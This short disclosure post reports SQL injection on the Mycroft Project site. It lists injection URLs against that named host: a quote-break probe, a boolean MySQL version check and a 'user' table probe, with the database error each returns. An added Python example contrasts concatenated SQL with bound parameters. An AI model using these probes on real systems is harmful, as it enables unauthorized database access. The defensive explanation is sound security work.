Mycroft Project is vulnerable to SQL injection.
Injection:
http://mycroft.mozdev.org/search-engines.html?category=64'
MySQL version check:
http://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=4 <-----true
http://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=5 <-----false
Error generated when looking for a nonexistent user table:
http://mycroft.mozdev.org/search-engines.html?category=64 and (select 1 from user limit 0,1)=1
error = SELECT command denied to user 'pr_mycroft'@'localhost' for table 'user'
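The root cause behind the requests above, as an added example that is not code from the Mycroft site: a handler that concatenates category into its query, beside one that allow-lists digits and binds the value. The SQLite table, its column names and the "64 and 1=1" / "64 and 1=2" inputs are constructed stand-ins, since SQLite has no @@version.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE engines (name TEXT, category INTEGER)")
    db.executemany("INSERT INTO engines VALUES (?, ?)",
                   [("alpha", 64), ("beta", 64), ("gamma", 7)])
    return db

def search_vulnerable(db, category):
    # The request value is pasted into the SQL text, so it is parsed as SQL.
    sql = ("SELECT name FROM engines WHERE category = " + category +
           " ORDER BY name")
    return [row[0] for row in db.execute(sql)]

def search_hardened(db, category):
    # 1) Allow-list ASCII digits only. 2) Bind the value, never concatenate.
    if not re.fullmatch(r"[0-9]{1,9}", category):
        raise ValueError("category must be a non-negative integer")
    rows = db.execute(
        "SELECT name FROM engines WHERE category = ? ORDER BY name",
        (int(category),))
    return [row[0] for row in rows]

def hardened_rejects(db, category):
    # True when the hardened handler refuses the value before touching SQL.
    try:
        search_hardened(db, category)
        return False
    except ValueError:
        return True

# The three category values shown in the post.
PAGE_PAYLOADS = [
    "64'",
    "64 and substring(@@version,1,1)=4",
    "64 and (select 1 from user limit 0,1)=1",
]

if __name__ == "__main__":
    db = make_db()
    # Concatenated query: an appended condition changes the result set.
    print(search_vulnerable(db, "64 and 1=1"))
    print(search_vulnerable(db, "64 and 1=2"))
    for payload in PAGE_PAYLOADS:
        print(repr(payload), "rejected:", hardened_rejects(db, payload))
    print(search_hardened(db, "64"))
```

The "SELECT command denied" error in the post shows the database account was already restricted; input validation and bound parameters remove the injection point itself.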